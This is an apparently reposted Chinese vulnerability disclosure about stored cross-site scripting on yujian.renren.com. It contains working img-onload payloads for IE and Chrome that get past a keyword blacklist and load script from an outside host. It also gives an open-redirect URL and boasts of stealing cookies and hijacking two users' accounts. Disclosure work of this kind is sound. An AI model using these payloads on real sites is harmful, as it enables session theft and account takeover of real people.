来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 木桶效应盛水的木桶是由许多块木板箍成的,盛水量也是由这些木板共同决定的。若其中一块木板很短,则此木桶的盛水量就被短板所限制。这块短板就成了这个木桶盛水量的限制因素...
|
木桶效应
盛水的木桶是由许多块木板箍成的,盛水量也是由这些木板共同决定的。若其中一块木板很短,则此木桶的盛水量就被短板所限制。这块短板就成了这个木桶盛水量的“限制因素”(或称“短板效应”)。若要使此木桶盛水量增加,只有换掉短板或将短板加长才成。人们把这一规律总结为“木桶原理”,或“木桶定律”,又称“短板理论”。
--摘自百度君
详细说明:站点:
http://yujian.renren.com
此站虽说有针对用户的输入过滤,但是仍可以绕过。
多处存储跨站,可致账号被劫持
漏洞证明:1·名称、资料、爱好处可绕过限制跨站
 2·资料爱好
 只要访问主页即可命中
不过,这里做了一些限制,过滤器过滤 script /onerror 等关键字,并且有字符数200的限制!
于是构造
IE
<img src="http://t.cn/h5UEoS" onload="document.getElementsByTagName('script')[2].src='http://1111.com'">
chrome
<img src="http://t.cn/h5UEoS" onload="var script=document.createElement('SCRIPT');script.setAttribute('src','http://1111.com');document.getElementsByTagName('head')[0].appendChild(script);">
绕过了此黑名单过滤器
截取的cookie:
 可见人气还是很旺呐……
由此yujian.renren.com 的域,顺利进入到renren.com的域,至此主站被沦陷。
劫持2个妹子账号:
  过年了再送个URL跳转:http://www.renren.com/pages/autoLogin-ads.jsp?mainPage=http://wooyun.org
你们是不是也意思意思-0-
修复方案:
白名单可能更好些 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
